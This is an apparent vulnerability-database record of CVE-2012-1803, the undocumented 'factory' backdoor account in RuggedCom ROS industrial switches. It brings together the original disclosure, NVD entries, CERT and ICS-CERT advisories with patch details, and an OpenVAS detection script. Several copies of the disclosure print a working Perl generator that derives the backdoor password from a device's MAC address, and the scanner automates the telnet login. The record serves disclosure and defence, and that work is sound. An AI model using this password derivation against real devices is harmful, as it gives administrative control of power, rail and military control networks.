DATABASE RESOURCES PRICING ABOUT US

{"id": "SECURITYVULNS:DOC:28008", "vendorId": null, "type": "securityvulns", "bulletinFamily": "software", "title": "RuggedCom - Backdoor Accounts in my SCADA network? You don't say...", "description": "Title: Undocumented Backdoor Access to RuggedCom Devices\r\nAuthor: jc\r\nOrganization: JC CREW\r\nDate: April 23, 2012\r\nCVE: CVE-2012-1803\r\n\r\nBackground:\r\nRuggedCom is one of a handful of networking vendors who capitalize on\r\nthe market for "Industrial Strength" and "Hardened" networking\r\nequipment. You'll find their gear installed in traffic control\r\nsystems, railroad communications systems, power plants, electrical\r\nsubstations, and even US military sites. Beyond simple L2 and L3\r\nnetworking these devices are also used for serial-to-ip converstion in\r\nSCADA systems and they even support modbus and dnp3. RuggedCom\r\npublished a handy guide to some of their larger customers at\r\nwww.ruggedcom.com/about/customers/. My favorite quote is from a\r\ncontractor who installed RuggedCom equipment at a US Air Force base:\r\n"Reliability was not an option." How unfortunately apropos.\r\n\r\nProblem:\r\nAn undocumented backdoor account exists within all released versions\r\nof RuggedCom's Rugged Operating System (ROS\u00ae). The username for the\r\naccount, which cannot be disabled, is "factory" and its password is\r\ndynamically generated based on the device's MAC address. Multiple\r\nattempts have been made in the past 12 months to have this backdoor\r\nremoved and customers notified.\r\n\r\nExploit:\r\n#!/usr/bin/perl\r\nif (! defined $ARGV[0]) {\r\nprint "+========================================== \n";\r\nprint "+ RuggedCom ROS Backdoor Password Generator \n";\r\nprint "+ JC CREW April 23 2012 \n";\r\nprint "+ Usage:\n$0 macaddress \n";\r\nprint "+========================================== \n";\r\nexit; }\r\n$a = $ARGV[0];\r\n$a =~ s/[^A-F0-9]+//simg;\r\n@b = reverse split /(\S{2})/,$a;\r\n$c = join "", @b;\r\n$c .= "0000";\r\n$d = hex($c) % 999999929;\r\nprint "$d\n";\r\n\r\nExample usage:\r\nGiven a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some\r\nperl and learn that the password for "factory" is 60644375.\r\n\r\n[jc@pig.aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00\r\n60644375\r\n[jc@pig.aids ros]$\r\n\r\nShoutouts:\r\nCERT/CC for doing great work in trying to get vendors to actually fix things.\r\nJC CREW\r\n\r\nTimeline:\r\nApr 2011 - Vendor notified directly\r\nJul 2011 - Vendor verbally acknowledges knowledge of backdoor,\r\nand ceases communication.\r\nFeb 11 2012 - US-CERT notified\r\nMar 12 2012 - Vendor responds to US-CERT.\r\nApr 06 2012 - Due to lack of further contact by vendor, CERT sets\r\npublic disclosure for April 13 2012\r\nApr 10 2012 - Vendor states they need another three weeks to alert\r\ntheir customers, but not fix the vulnerability.\r\nApr 11 2012 - Clarification requested regarding need for additional three weeks.\r\nApr 23 2012 - No response from vendor.\r\nApr 23 2012 - This disclosure.\r\n\r\nKeywords:\r\nRuggedCom\r\nROS\r\nRuggedSwitch\r\nRuggedServer\r\nbackdoor\r\n", "published": "2012-04-24T00:00:00", "modified": "2012-04-24T00:00:00", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:28008", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2012-1803"], "immutableFields": [], "lastseen": "2018-08-31T11:10:44", "viewCount": 197, "enchantments": {"score": {"value": 0.9, "vector": "NONE"}, "dependencies": {"references": [{"type": "cert", "idList": ["VU:889195"]}, {"type": "cve", "idList": ["CVE-2012-1803", "CVE-2012-2441"]}, {"type": "exploitdb", "idList": ["EDB-ID:18779"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:7023CE928862A6C91F9E129FBE1EB5CE"]}, {"type": "ics", "idList": ["ICSA-12-146-01A"]}, {"type": "nessus", "idList": ["SCADA_RUGGEDOS_FACTORY_BACKDOOR.NBIN"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103499"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:112149"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12347"]}]}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2012-1803"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/TELNET/TELNET_RUGGEDCOM"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310103499"]}]}, "exploitation": null, "affected_software": {"major_version": []}, "epss": [{"cve": "CVE-2012-1803", "epss": "0.008290000", "percentile": "0.793850000", "modified": "2023-03-20"}], "vulnersScore": 0.9}, "_state": {"dependencies": 1678962961, "score": 1684016453, "affected_software_major_version": 0, "epss": 1679322135}, "_internal": {"score_hash": "3d749cdaad5fba82bf5ccf6dba0c67cb"}, "sourceData": "", "affectedSoftware": [], "appercut": {}, "exploitpack": {}, "hackapp": {}, "toolHref": "", "w3af": {}}

{"exploitpack": [{"lastseen": "2020-04-01T19:04:46", "description": "\nRuggedCom Devices - Backdoor Access", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "exploitpack", "title": "RuggedCom Devices - Backdoor Access", "bulletinFamily": "exploit", "hackapp": {}, "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803"], "modified": "2012-04-24T00:00:00", "id": "EXPLOITPACK:7023CE928862A6C91F9E129FBE1EB5CE", "href": "", "sourceData": "Title: Undocumented Backdoor Access to RuggedCom Devices\nAuthor: jc\nOrganization: JC CREW\nDate: April 23, 2012\nCVE: CVE-2012-1803\n\nBackground:\nRuggedCom is one of a handful of networking vendors who capitalize on\nthe market for \"Industrial Strength\" and \"Hardened\" networking\nequipment. You'll find their gear installed in traffic control\nsystems, railroad communications systems, power plants, electrical\nsubstations, and even US military sites. Beyond simple L2 and L3\nnetworking these devices are also used for serial-to-ip converstion in\nSCADA systems and they even support modbus and dnp3. RuggedCom\npublished a handy guide to some of their larger customers at\nwww.ruggedcom.com/about/customers/. My favorite quote is from a\ncontractor who installed RuggedCom equipment at a US Air Force base:\n\"Reliability was not an option.\" How unfortunately apropos.\n\nProblem:\nAn undocumented backdoor account exists within all released versions\nof RuggedCom's Rugged Operating System (ROS\u00ae). The username for the\naccount, which cannot be disabled, is \"factory\" and its password is\ndynamically generated based on the device's MAC address. Multiple\nattempts have been made in the past 12 months to have this backdoor\nremoved and customers notified.\n\nExploit:\n#!/usr/bin/perl\nif (! defined $ARGV[0]) {\nprint \"+========================================== \\n\";\nprint \"+ RuggedCom ROS Backdoor Password Generator \\n\";\nprint \"+ JC CREW April 23 2012 \\n\";\nprint \"+ Usage:\\n$0 macaddress \\n\";\nprint \"+========================================== \\n\";\nexit; }\n$a = $ARGV[0];\n$a =~ s/[^A-F0-9]+//simg;\n@b = reverse split /(\\S{2})/,$a;\n$c = join \"\", @b;\n$c .= \"0000\";\n$d = hex($c) % 999999929;\nprint \"$d\\n\";\n\nExample usage:\nGiven a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some\nperl and learn that the password for \"factory\" is 60644375.\n\n[jc (at) pig (dot) aids [email concealed] ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00\n60644375\n[jc (at) pig (dot) aids [email concealed] ros]$\n\nShoutouts:\nCERT/CC for doing great work in trying to get vendors to actually fix things.\nJC CREW\n\nTimeline:\nApr 2011 - Vendor notified directly\nJul 2011 - Vendor verbally acknowledges knowledge of backdoor,\nand ceases communication.\nFeb 11 2012 - US-CERT notified\nMar 12 2012 - Vendor responds to US-CERT.\nApr 06 2012 - Due to lack of further contact by vendor, CERT sets\npublic disclosure for April 13 2012\nApr 10 2012 - Vendor states they need another three weeks to alert\ntheir customers, but not fix the vulnerability.\nApr 11 2012 - Clarification requested regarding need for additional three weeks.\nApr 23 2012 - No response from vendor.\nApr 23 2012 - This disclosure.\n\nKeywords:\nRuggedCom\nROS\nRuggedSwitch\nRuggedServer\nbackdoor", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-10-11T19:27:40", "description": "Rugged Operating System is prone to an unauthorized-access\n vulnerability due to a backdoor in all versions of the application.", "cvss3": {}, "published": "2012-06-21T00:00:00", "type": "openvas", "title": "Rugged Operating System Backdoor Unauthorized Access Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1803"], "modified": "2019-10-08T00:00:00", "id": "OPENVAS:1361412562310103499", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103499", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Rugged Operating System Backdoor Unauthorized Access Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/o:siemens:ruggedcom_rugged_operating_system\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103499\");\n script_version(\"2019-10-08T10:38:10+0000\");\n script_bugtraq_id(53215);\n script_cve_id(\"CVE-2012-1803\");\n script_tag(name:\"cvss_base\", value:\"8.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-10-08 10:38:10 +0000 (Tue, 08 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2012-06-21 13:07:51 +0200 (Thu, 21 Jun 2012)\");\n script_name(\"Rugged Operating System Backdoor Unauthorized Access Vulnerability\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"This script is Copyright (C) 2012 Greenbone Networks GmbH\");\n script_dependencies(\"gb_siemens_ruggedcom_consolidation.nasl\", \"toolcheck.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_mandatory_keys(\"siemens_ruggedcom/telnet/detected\", \"Tools/Present/perl\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/53215\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/archive/1/522467\");\n script_xref(name:\"URL\", value:\"http://www.us-cert.gov/control_systems/pdf/ICS-ALERT-12-116-01.pdf\");\n script_xref(name:\"URL\", value:\"http://www.us-cert.gov/control_systems/pdf/ICSA-12-146-01.pdf\");\n script_xref(name:\"URL\", value:\"http://www.kb.cert.org/vuls/id/889195\");\n\n script_tag(name:\"solution\", value:\"Updates are available. Please see the references for more information.\");\n\n script_tag(name:\"summary\", value:\"Rugged Operating System is prone to an unauthorized-access\n vulnerability due to a backdoor in all versions of the application.\");\n\n script_tag(name:\"impact\", value:\"Attackers can exploit this issue to gain unauthorized access to the\n affected application. This may aid in further attacks.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\nif(get_kb_item(\"default_credentials/disable_default_account_checks\"))\n exit(0);\n\ninclude(\"telnet_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\n\nif(!port = get_app_port(cpe:CPE, service:\"telnet\"))\n exit(0);\n\nif(!get_app_location(port:port, cpe:CPE))\n exit(0);\n\nbanner = telnet_get_banner(port:port);\nif(!banner || (\"Rugged Operating System\" >!< banner || \"MAC Address\" >!< banner))\n exit( 0 );\n\nsoc = open_sock_tcp(port);\nif(!soc)\n exit(0);\n\nr = telnet_negotiate(socket:soc);\nif(!r || \"Rugged Operating System\" >!< r || \"MAC Address\" >!< r) {\n telnet_close_socket(socket:soc, data:r);\n exit(0);\n}\n\nmac_string = eregmatch(pattern:\"MAC Address:[ ]+([0-9A-F-]+)\", string:r);\nif(!mac_string[1]) {\n telnet_close_socket(socket:soc, data:r);\n exit(0);\n}\n\nmac = mac_string[1];\nmac = split(mac, sep:\"-\", keep:FALSE);\nif(max_index(mac) != 6) {\n telnet_close_socket(socket:soc, data:r);\n exit(0);\n}\n\nfor(x=5; x >= 0; x--) {\n mac_reverse += mac[x];\n}\n\nmac_reverse += '0000';\n\n# it seems that the resulting int is too big for nasl and computing the pass fail. perl also warn about an \"Integer overflow in hexadecimal\" (on 32bit) but compute right.\n# so use perl...\nargv[i++] = \"perl\";\nargv[i++] = \"-X\";\nargv[i++] = \"-e\";\nargv[i++] = 'print (hex(\"' + mac_reverse + '\") % 999999929);';\nargv[i++] = '2>/dev/null';\npass = pread(cmd:\"perl\", argv:argv, cd:FALSE);\n\nif(pass !~ \"[0-9]+\") {\n telnet_close_socket(socket:soc, data:r);\n exit(0);\n}\n\nuser = \"factory\";\n\nsend(socket:soc, data:user + '\\n');\nrecv = recv(socket:soc, length:512);\nif(!recv || \"Enter Password\" >!< recv) {\n telnet_close_socket(socket:soc, data:recv);\n exit(0);\n}\n\nsend(socket:soc, data:pass + '\\n');\nrecv = recv(socket:soc, length:2048);\ntelnet_close_socket(socket:soc, data:recv);\n\nif(\"Main Menu\" >< recv && (\"Administration\" >< recv || \"Ethernet Ports\" >< recv || \"Diagnostics\" >< recv)) {\n security_message(port:port, data:'It was possible to login into the Rugged Operating System using username \"factory\" and password \"' + pass + '\".');\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-08-14T15:03:23", "description": "RuggedCom Rugged Operating System (ROS) 3.10.x and earlier has a factory account with a password derived from the MAC Address field in the banner, which makes it easier for remote attackers to obtain access by performing a calculation on this address value, and then establishing a (1) TELNET, (2) remote shell (aka rsh), or (3) serial-console session.", "cvss3": {}, "published": "2012-04-28T00:55:00", "type": "cve", "title": "CVE-2012-1803", "cwe": ["CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803"], "modified": "2022-02-01T16:53:00", "cpe": ["cpe:/o:siemens:ruggedcom_rugged_operating_system:3.10.1"], "id": "CVE-2012-1803", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1803", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:siemens:ruggedcom_rugged_operating_system:3.10.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-08-14T17:11:01", "description": "RuggedCom Rugged Operating System (ROS) before 3.3 has a factory account with a password derived from the MAC Address field in a banner, which makes it easier for remote attackers to obtain access by performing a calculation on this address value, and then establishing a (1) SSH or (2) HTTPS session, a different vulnerability than CVE-2012-1803.", "cvss3": {}, "published": "2012-04-28T00:55:00", "type": "cve", "title": "CVE-2012-2441", "cwe": ["CWE-521"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803", "CVE-2012-2441"], "modified": "2022-02-01T16:53:00", "cpe": [], "id": "CVE-2012-2441", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2441", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}, "cpe23": []}], "packetstorm": [{"lastseen": "2016-12-05T22:12:31", "description": "", "cvss3": {}, "published": "2012-04-24T00:00:00", "type": "packetstorm", "title": "RuggedCom Device Undocumented Backdoor", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-1803"], "modified": "2012-04-24T00:00:00", "id": "PACKETSTORM:112149", "href": "https://packetstormsecurity.com/files/112149/RuggedCom-Device-Undocumented-Backdoor.html", "sourceData": "`Title: Undocumented Backdoor Access to RuggedCom Devices \nAuthor: jc \nOrganization: JC CREW \nDate: April 23, 2012 \nCVE: CVE-2012-1803 \n \nBackground: \nRuggedCom is one of a handful of networking vendors who capitalize on \nthe market for \"Industrial Strength\" and \"Hardened\" networking \nequipment. You'll find their gear installed in traffic control \nsystems, railroad communications systems, power plants, electrical \nsubstations, and even US military sites. Beyond simple L2 and L3 \nnetworking these devices are also used for serial-to-ip converstion in \nSCADA systems and they even support modbus and dnp3. RuggedCom \npublished a handy guide to some of their larger customers at \nwww.ruggedcom.com/about/customers/. My favorite quote is from a \ncontractor who installed RuggedCom equipment at a US Air Force base: \n\"Reliability was not an option.\" How unfortunately apropos. \n \nProblem: \nAn undocumented backdoor account exists within all released versions \nof RuggedCom's Rugged Operating System (ROS\u00ae). The username for the \naccount, which cannot be disabled, is \"factory\" and its password is \ndynamically generated based on the device's MAC address. Multiple \nattempts have been made in the past 12 months to have this backdoor \nremoved and customers notified. \n \nExploit: \n#!/usr/bin/perl \nif (! defined $ARGV[0]) { \nprint \"+========================================== \\n\"; \nprint \"+ RuggedCom ROS Backdoor Password Generator \\n\"; \nprint \"+ JC CREW April 23 2012 \\n\"; \nprint \"+ Usage:\\n$0 macaddress \\n\"; \nprint \"+========================================== \\n\"; \nexit; } \n$a = $ARGV[0]; \n$a =~ s/[^A-F0-9]+//simg; \n@b = reverse split /(\\S{2})/,$a; \n$c = join \"\", @b; \n$c .= \"0000\"; \n$d = hex($c) % 999999929; \nprint \"$d\\n\"; \n \nExample usage: \nGiven a RuggedCom device with MAC address 00-0A-DC-00-00-00, run some \nperl and learn that the password for \"factory\" is 60644375. \n \n[jc@pig.aids ros]$ ./ruggedfail.pl 00-0A-DC-00-00-00 \n60644375 \n[jc@pig.aids ros]$ \n \nShoutouts: \nCERT/CC for doing great work in trying to get vendors to actually fix things. \nJC CREW \n \nTimeline: \nApr 2011 - Vendor notified directly \nJul 2011 - Vendor verbally acknowledges knowledge of backdoor, \nand ceases communication. \nFeb 11 2012 - US-CERT notified \nMar 12 2012 - Vendor responds to US-CERT. \nApr 06 2012 - Due to lack of further contact by vendor, CERT sets \npublic disclosure for April 13 2012 \nApr 10 2012 - Vendor states they need another three weeks to alert \ntheir customers, but not fix the vulnerability. \nApr 11 2012 - Clarification requested regarding need for additional three weeks. \nApr 23 2012 - No response from vendor. \nApr 23 2012 - This disclosure. \n \nKeywords: \nRuggedCom \nROS \nRuggedSwitch \nRuggedServer \nbackdoor \n`\n", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://packetstormsecurity.com/files/download/112149/ruggedcom-backdoor.txt"}], "ics": [{"lastseen": "2023-09-10T06:15:22", "description": "## Overview\n\n### **\\--------- Begin Update A Part 1 of 2 --------**\n\nThis is an update to the original advisory titled ICSA-12-146-01\u2014RuggedCom Weak Cryptography for Password Vulnerability that was published May 25, 2012, on the ICS-CERT Web page. Independent researcher Justin W. Clarke identified a default backdoor user accountRuggedCom Backdoor Accounts, http://seclists.org/fulldisclosure/2012/Apr/277, Web site last accessed June 18, 2012., US-CERT Vulnerability Note, http://www.kb.cert.org/vuls/id/889195, Web site last accessed June 18, 2012., NERC Advisory, http://www.nerc.com/fileUploads/File/Events%20Analysis/A-2012-05-07-01_Ruggedcom_Unauthorized_Access_Vulnerability.pdf, Web site last accessed June 18, 2012. with a weak password encryption vulnerability in the RuggedCom Rugged Operating System (ROS). This vulnerability can be remotely exploited. Exploits that target this vulnerability are known to be publicly available.\n\nMr. Clarke provided this information to both CERT/CC and ICS-CERT. ICS-CERT coordinated a mitigation strategy with RuggedCom, a Siemens company. RuggedCom has produced new firmware versions that resolve the reported vulnerability.\n\nPrevious versions of this document erroneously stated that ICS-CERT had confirmed that the patch resolves the vulnerability. ICS-CERT has tested one version of the patched firmware (v3.10.1) and can confirm that the public exploits no longer work on the patched versions.\n\n### **\\--------- End Update A Part 1 of 2 ----------**\n\nThis advisory is a follow-up to ICS-ALERT-12-116-01A RuggedCom Weak Cryptography for Password that was published April 26, 2012, on the ICS-CERT Web page.\n\n## Affected Products\n\nRuggedCom RuggedSwitch or RuggedServer devices are affected using the following versions of ROS:\n\n * 3.2.x and earlier, and\n * 3.3.x and above.\n\n## Impact\n\nAn attacker can use a simple publicly available script to generate the default password and gain administrative access to the unit.\n\nImpact to individual organizations depends on many factors that are unique to each organization. ICS-CERT recommends that organizations evaluate the impact of this vulnerability based on their operational environment, architecture, and product implementation.\n\n## Background\n\nRuggedCom makes network equipment that is intended for deployment in harsh environments. Their products can be found in applications such as traffic control systems, railroad communications systems, power plants, electrical substations, and military sites. Beyond Layer 2 and Layer 3 networking, these devices also provide serial-to-IP conversion in SCADA systems, and they support MODBUS and DNP3 protocols.\n\n## Vulnerability Characterization\n\n### Vulnerability Overview\n\nWeak Cryptography for PasswordsCWE, http://cwe.mitre.org/data/definitions/261.html, Web site last accessed June 18, 2012.\n\nAn undocumented backdoor account exists within all previously released versions of RuggedCom\u2019s ROS. The username for the account, which cannot be disabled, is \u201cfactory,\u201d and its password is dynamically generated based on the device\u2019s MAC address.\n\n[CVE-2012-1803](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1803>) has been assigned to this vulnerability. A CVSS v2 base score of 8.5 has been assigned; the CVSS vector string is [(AV:N/AC:M/Au:S/C:C/I:C/A:C)](<http://nvd.nist.gov/cvss.cfm?version=2&vector=AV:N/AC:M/Au:S/C:C/I:C/A:C>).\n\n### Vulnerability Details\n\n#### Exploitability\n\nThis vulnerability is exploitable remotely.\n\n#### Existence of Exploit\n\nPublic exploits are known to target this vulnerability.\n\n#### Difficulty\n\nAn attacker with a low skill level would be able to exploit this vulnerability.\n\n## Mitigation\n\n### **\\--------- Begin Update A Part 2 of 2 --------**\n\nVersions 3.10.1, 3.9.3, 3.8.5, and 3.7.9 of the ROS firmware with security-related fixes are now available and can be obtained from RuggedCom technical support at [support@ruggedcom.com](<mailto:support@ruggedcom.com>).\n\nROS v3.11.x, a new firmware release containing additional functionality as well as the same security fixes, will be released within the next few weeks; RuggedCom will release a product bulletinLatest news on ROS Device Security Issue, http://www.ruggedcom.com/productbulletin/ros-security-page/, Web site last accessed June 18, 2012. to notify customers when it is available.\n\n### **\\--------- End Update A Part 2 of 2 ---------- **\n\nTo address security issues, the following changes are included in all the new ROS firmware versions:\n\n * removal of factory account as referenced in ICSA -12-146-01 and NERC Alert A-2012-05-07-01,\n * change default condition of insecure communication services to disabled,\n * improval of security for user account password storage,\n * detection and alarm for weak password strength, and\n * removal of device information from standard login banner.\n\nNote: These new versions of the ROS firmware remove the factory account and the associated security vulnerability. Customers using these new versions of the firmware should take special care not to lose the user defined password to a device\u2019s administrative account as recovering from a lost administrative password will now require physical access to the device to reset the passwords.\n\nRuggedCom recommends that customers using ROS versions older than v3.7 upgrade to a newer version. If this is not possible, RuggedCom has indicated that they will address updates to older versions of the firmware on a case-by-case basis.\n\nSiemens has issued security advisory \u201cSSA-826381: Multiple Security Vulnerabilities in RuggedCom ROS-based Devices\u201d regarding this vulnerability. It can be found on the [Siemens ProductCERT advisory Web page](<http://www.siemens.com/cert/advisories/>).\n\nICS-CERT encourages asset owners to take additional defensive measures to protect against this and other cybersecurity risks.\n\n * Minimize network exposure for all control system devices. Critical devices should not directly face the Internet.\n * Locate control system networks and remote devices behind firewalls, and isolate them from the business network.\n * When remote access is required, use secure methods, such as Virtual Private Networks (VPNs), recognizing that VPN is only as secure as the connected devices.\n\nThe Control Systems Security Program (CSSP) also provides a section for control systems security recommended practices on the CSSP web page. Several recommended practices are available for reading and download, including Improving Industrial Control Systems Cybersecurity with Defense-in-Depth Strategies.\n\nOrganizations observing any suspected malicious activity should follow their established internal procedures and report their findings to ICS-CERT for tracking and correlation against other incidents.\n", "cvss3": {}, "published": "2018-09-06T12:00:00", "type": "ics", "title": "RuggedCom Weak Cryptography for Password Vulnerability (Update A)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 6.8, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:M/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1803"], "modified": "2018-09-06T12:00:00", "id": "ICSA-12-146-01A", "href": "https://www.cisa.gov/news-events/ics-advisories/icsa-12-146-01a", "cvss": {"score": 8.5, "vector": "AV:N/AC:M/Au:S/C:C/I:C/A:C"}}], "cert": [{"lastseen": "2023-05-31T14:40:41", "description": "### Overview\n\nRuggedCom Rugged Operating System (ROS) contains a hard-coded user account with a predictable password.\n\n### Description\n\n[RuggedCom Rugged Operating System](<http://www.ruggedcom.com/support/software/index.php>) (ROS), used in RuggedCom [network infrastructure devices](<http://www.ruggedcom.com/products/index.php>), contains a hard-coded user account named \"`factory`\" that cannot be disabled. The password for this account is based on the device's MAC address and can be reverse engineered easily ([CWE-261](<http://cwe.mitre.org/data/definitions/261.html>): Weak Cryptography for Passwords).\n\nROS also supports HTTP(S) and `ssh` services. In ROS 3.3.x, these services do not use the `factory` account. ROS does not appear to log successful or unsuccessful login attempts for the `factory` account. \n \nMore information is available in \"[Undocumented Backdoor Access to RuggedCom Devices](<http://seclists.org/fulldisclosure/2012/Apr/277>)\" and RuggedCom's [security bulletin](<http://www.ruggedcom.com/productbulletin/ros-security-page/>). \n \n--- \n \n### Impact\n\nAn attacker with knowledge of an ROS device's MAC address may be able to gain complete administrative control of the device. The MAC address is [displayed](<http://arstechnica.com/business/news/2012/04/backdoor-in-mission-critical-hardware-threatens-power-traffic-control-systems.ars>) in the pre-authentication banner. \n \n--- \n \n### Solution\n\nAccording to RuggedCom's [security bulletin](<http://www.ruggedcom.com/productbulletin/ros-security-page/>), \"_Version 3.10.1 of the ROS\u00ae firmware with security related fixes will be released on Tuesday May 22, 2012 and can be obtained by emailing support@ruggedcom.com. Other ROS\u00ae firmware versions containing the same security fixes (3.9.3, 3.8.5, 3.7.9 &amp; 3.11.0) will be released over the next few weeks on a staggered basis as development and testing is completed._\" \n \nICS-CERT Advisory [ICSA-12-146-01A](<http://www.us-cert.gov/control_systems/pdf/ICSA-12-146-01A.pdf>) confirms that ROS version 3.10.1 is no longer affected, and that versions 3.9.3, 3.8.5, and 3.7.9 are now available. \n \n--- \n \n**Workarounds** \n \nROS 3.3.x allows users to disable the `rsh` service and set the number of allowed `telnet` connections to 0. ROS 3.2.x does not alllow the `rsh` or `telnet` services to be disabled. \n \n--- \n \n### Vendor Information\n\n889195\n\nFilter by status: All Affected Not Affected Unknown\n\nFilter by content: __ Additional information available\n\n__ Sort by: Status Alphabetical\n\nExpand all\n\n**Javascript is disabled. Click here to view vendors.**\n\n### RuggedCom __ Affected\n\nNotified: February 10, 2012 Updated: July 18, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nRuggedCom advises ROS 3.3.x users to disable the `rsh` service and set the number of allowed `telnet` connections to 0. This vulnerability is addressed in ROS versions 3.10.1, 3.9.3, 3.8.5, and 3.7.9.\n\n### Vendor References\n\n * <http://www.ruggedcom.com/productbulletin/ros-security-page/>\n\n### Siemens __ Affected\n\nUpdated: April 24, 2012 \n\n### Status\n\nAffected\n\n### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vendor Information \n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### Addendum\n\nRuggedCom was [acquired](<http://www.ruggedcom.com/about/investor/pr/takeover.php>) by Siemens in March 2012.\n\nIf you have feedback, comments, or additional information about this vulnerability, please send us [email](<mailto:cert@cert.org?Subject=VU%23889195 Feedback>).\n\n \n\n\n### CVSS Metrics\n\nGroup | Score | Vector \n---|---|--- \nBase | 8.5 | AV:N/AC:M/Au:S/C:C/I:C/A:C \nTemporal | 7.3 | 